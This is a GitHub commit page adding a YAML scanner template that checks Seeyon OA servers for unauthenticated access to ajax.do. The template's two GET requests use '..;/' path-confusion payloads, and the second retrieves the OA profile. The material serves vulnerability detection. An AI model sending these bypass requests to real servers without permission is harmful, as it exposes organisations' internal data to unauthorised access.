Skip to content

Commit

Permalink
seeyon-ajax-unauthorized-access (chaitin#1009)
Browse files Browse the repository at this point in the history
  • Loading branch information
x1n9Qi8 authored Jan 19, 2021
1 parent 6cf3978 commit d5ad8c7
Showing 1 changed file with 16 additions and 0 deletions.
16 changes: 16 additions & 0 deletions pocs/seeyon-ajax-unauthorized-access.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: poc-yaml-seeyon-ajax-unauthorized-access
rules:
- method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: |
response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: |
response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
detail:
author: x1n9Qi8
links:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html

0 comments on commit d5ad8c7

Please sign in to comment.